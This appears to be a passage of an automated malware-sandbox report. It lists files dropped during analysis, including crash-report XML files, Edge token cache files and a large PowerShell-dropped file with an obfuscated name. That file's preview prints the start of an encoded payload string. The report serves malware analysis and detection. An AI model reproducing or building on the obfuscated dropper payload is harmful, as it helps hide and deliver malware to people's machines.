                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.6.4.4.7.3.0.6.0.1.0.3.0.8.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.6.4.4.7.3.0.6.8.8.2.3.1.1.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.1.1.7.b.8.5.e.-.4.0.8.2.-.4.d.3.b.-.a.9.c.b.-.b.8.c.1.1.1.d.3.7.a.8.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.g.S.v.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.9.c.-.0.0.0.1.-.0.0.1.9.-.2.6.9.6.-.9.e.6.c.0.7.9.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.9.6.f.a.7.2.6.f.c.8.4.f.d.4.6.d.0.3.d.d.3.c.3.2.6.8.9.f.6.4.5.e.0.4.2.2.2.7.8.!.R.e.g.S.v.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.9././.1.0././.2.5.:.0.9.:.0.1.:.0.0.!.1.5.0.b.1.!.R.e.g.S.v.c.s...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....

                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERB1C5.tmp.WERInternalMetadata.xml

                                                                              Download File
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):7622
                                                                              Entropy (8bit):3.7057129631733656
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:20AF70B4087FA5D19B776D62D7FF4D5E
                                                                              SHA1:E1D177789C06B4AD5F9B9C889297C8E83AA055F6
                                                                              SHA-256:ECC0C5AE6F90CB0B760E39E3359744F0121A321B0D428689518ED3EDEEE18F1A
                                                                              SHA-512:C848460C744AA68182BB05DAD08A7EC50510F2591D7A50964F869D90BDBC01AC3E24CE0FC3DC05F40F4062A29844D2781AA5B5F9812B421FC293614440DCC8D0
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.7.6.<./.P.i.

                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERB203.tmp.WERInternalMetadata.xml

                                                                              Download File
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):7622
                                                                              Entropy (8bit):3.707764835562751
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:E582E9D1FD30945C34ED6EA94CA6206A
                                                                              SHA1:8BC940238C4D83047392C844C0C0F1ED9C633749
                                                                              SHA-256:F3749B5DDDDAB9576B001CA2536F08706FAFA7753E72C83F4C00B194363D64A8
                                                                              SHA-512:FAD577AB950F4FC4891ADBF458BBC9BABEBF25735C985EF19E111C915D50ACD47C3BB29C8B0875F14C828FAB68054D561800F8EC07EB0F251D67C13A99A2C25F
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.8.0.<./.P.i.

                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERB204.tmp.xml

                                                                              Download File
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):4614
                                                                              Entropy (8bit):4.485063967834886
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:6645E570C2EB2C98D38ECF1F18C1AF01
                                                                              SHA1:2D5A84D8B1DA02BFE5A169B75DADC4390370C51B
                                                                              SHA-256:205EE75FE8BCE2DBC9101E36387CC426145351FA5560E5C975E0577199C53752
                                                                              SHA-512:725E6668FB247E08485A1A2A42D5E9ECC0A4F504A5A088F4795E167ABC168ABD3C3A3FF2343620DF52B9F42FBF544553E64CFCA3128DBFDD39A2931439E3E490
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="760837" />.. <arg nm="osinsty" val="2" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERB213.tmp.WERInternalMetadata.xml

                                                                              Download File
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):7622
                                                                              Entropy (8bit):3.7053129205097055
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:31C48ADB4CEE793D7E1B6A335AAB9550
                                                                              SHA1:D63FE11A2BF51A595D990D27118B61C53495A837
                                                                              SHA-256:0D8EE0F0483337BB2B7C93AC3C4AFBCBDE0A5640C65B63F94F4BEE13580D99B2
                                                                              SHA-512:86182764754DDF141E68F667538B26B862DE598E11AB88BC79FCFFDF321EB5E698F227C5FA92C3FD433536547793562AEC38C947FB62755AD5F6A21F1B2A271D
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.8.1.6.<./.P.i.

                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERB232.tmp.WERInternalMetadata.xml

                                                                              Download File
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):7622
                                                                              Entropy (8bit):3.704607115204237
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:0491554675F823383B92A2BBBE752ABF
                                                                              SHA1:263CD09F7A9968820C738FBACE625E881EFFE5F1
                                                                              SHA-256:9653F0BCE1FBE0B66B9A0093E78967DD6717C477EB8790ABC22E3AB80D42BA8E
                                                                              SHA-512:296CD157D6036F66F2311854F3A5C24E7BD76E35A489D0B6417EF732A64E94AD9C9A99FE073C511592DBB0645ADB4DBCAC2A33F0C3608D8581131F6CEF957937
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.0.4.<./.P.i.

                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERB243.tmp.xml

                                                                              Download File
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):4614
                                                                              Entropy (8bit):4.487355206788909
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:75AD00045460CBB1CA2CF84EA01F552A
                                                                              SHA1:567CC367A83FEFA7A9BA0AA5188EB0CDBD90D481
                                                                              SHA-256:4CA824DBC43F96A1039DF79FD387A4D33844AB1DEC72AFB1966C112330323C16
                                                                              SHA-512:DFAD4D04034E92EED2CA82C38C39E7F99E87A94EFA7B55772E9904C92ACB3CB3D2CA071D9E2056606AC5380EF032109046850FC2132839DBA4286201E9518BC7
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="760837" />.. <arg nm="osinsty" val="2" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERB253.tmp.xml

                                                                              Download File
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):4614
                                                                              Entropy (8bit):4.493342389665137
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:02F922F95E703DB473DAF1B34CB8E1EC
                                                                              SHA1:98FC62D92B75D01BB61E7926A01CA1B9C6896AC7
                                                                              SHA-256:40A8042EC3E83DE26F7B71D79D1E65461EB23094C7B6F32EEAF99AA93C6FAD77
                                                                              SHA-512:0D7649AAE3CA0BEFD5D23E341EE525975C6609C075BE1E0F1810A14369A3A7F24CB031E6274D780FD750E976471E279218E21048550502446CA8CDA9CCD79A17
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="760837" />.. <arg nm="osinsty" val="2" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERB262.tmp.xml

                                                                              Download File
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):4614
                                                                              Entropy (8bit):4.495789661916105
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:59B488EBF0EC3A3FC667A1DA5EDDC011
                                                                              SHA1:4E6BBFE32AB927B2DC564238CCE437BD5153E2D8
                                                                              SHA-256:132BE4A6DB111EF24DA97351454F599BBCB7BBCA4DD55A44A9D3A8233AD50377
                                                                              SHA-512:2286E41B23739A944BFBD4E51010E51CDD22ADB2672F9907F8F64F6D77BD170E214C5F19F6E5D337BED019493C11B27A7D6F2858D3841ACF9594A52736E004B7
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="760837" />.. <arg nm="osinsty" val="2" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                              C:\ProgramData\luasodkwdWWcjo\chutmaranikamana.~!!@@!!@!!!!!!@!@@@!!@!!@@!@@!!@@!!~

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with very long lines (65535)
                                                                              Category:dropped
                                                                              Size (bytes):7535383
                                                                              Entropy (8bit):2.296097591164397
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:8B2160164FA0AC208376E0C857F6695D
                                                                              SHA1:C66547080187BD0270BA6A69B50C2D42150872D3
                                                                              SHA-256:782E48635E2805D9D130E24FC2F2B0A70EEF63552F1D3B4D9EDF003AF55FDB22
                                                                              SHA-512:A5A445314D076761C72AEF94B65A23629845D644E7A3F7C204F4121F0773A5D3FF8FBBBF5D741DE83D7BAFD5AD44C2C501A21E892800DC7AFB93550134B04FC5
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:.$poppopmdabaomazyurao = "00000000256144015060123070140164343010254134222172030015107021273354122212064201052376165274152112351337103160020214247176054103233102112243323304274046117147234064001225233261011201337022005157223026052311261367331127141225373313232057007351151062063355357214026174227170116273027234130321236173302251333367353177062236237132026261345045300162003231060070022316203023161073357237101062164341224346334254164342104122137374002223371172141020321024133073227343142075301341345017250300333207140066327054266367367120147334015021365035027375171272375311372061040165150014231045124313376321063271070133331220072041234074242132260233135107122031156304342376365342313336224140017314242261072234275252170167142141174101002165115050017130175064266122024374003231035365343364007226210233151161322370202274227176051226117244167356133335075303120016012311266052325036010222023074146241364363261265341045075230105230101112025210033066347261035116344364213073167352260021316077177312033065

                                                                              C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2278
                                                                              Entropy (8bit):3.8617906529204857
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:1AB984A68690DF8ABA447D14DC520FC8
                                                                              SHA1:3E4CF2B703F11CD1773A745C43DA17B38912591C
                                                                              SHA-256:E9E42B69A581B002DE0C2CC3CF6880D9916EF2A9E141DBED1A54C4462EE44A0D
                                                                              SHA-512:6E3A15C7FFDFDF352D21636917E14A6867A8E7DCA8280B6A1CAB5646FC07BF3938F8D07594649D40B311358669B7CB568C3BAEA7A17842C0D86B243920DBA7EE
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.E.q.R.6.g.+.V.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.a.c.y.A.c.f.

                                                                              C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):4622
                                                                              Entropy (8bit):3.9921784967091902
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:4C725B1DC7223DEBC506B09B2F32A3AD
                                                                              SHA1:D3C52DC1EC4DA706C9170F59337744EF968AAFAE
                                                                              SHA-256:7187635E903AD2E5C9B459A9A6110094CE423D052EE53AC390828505A21292D4
                                                                              SHA-512:A8BFFCF9F54BAF4CF827B8F4C1F9EA43BCB6D0A1B21072B9A5A759242D1E16FF4926592BC790CA86BB36A1F2DC3DD980294C4A9F46DB2A4A2FDC506C51611133
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".s.A.z.t.0.A.e.V.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.a.c.y.A.c.f.

                                                                              C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2684
                                                                              Entropy (8bit):3.8987076802596636
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:B45E2F5D13CFF9D64531F1D3BEAB08E0
                                                                              SHA1:6BFD3F9461E90AF86A26637BB474CCF2E94EE6A8
                                                                              SHA-256:0BA1529EC2532CB70458BB7BD995F8A649339FD4A23CD5DBEAC6D4644E538CF6
                                                                              SHA-512:25F71062E0A100D7EF072E1C0F8C7E1B2388F71EDE29E9380C9996CBC398BAEE53AE61EE13D02A975DCBC9ECF48BF17D0F52B76034427A3FD9B3EEA8D0CBB96B
                                                                              Malicious:false
                                                                              Reputation:unknown
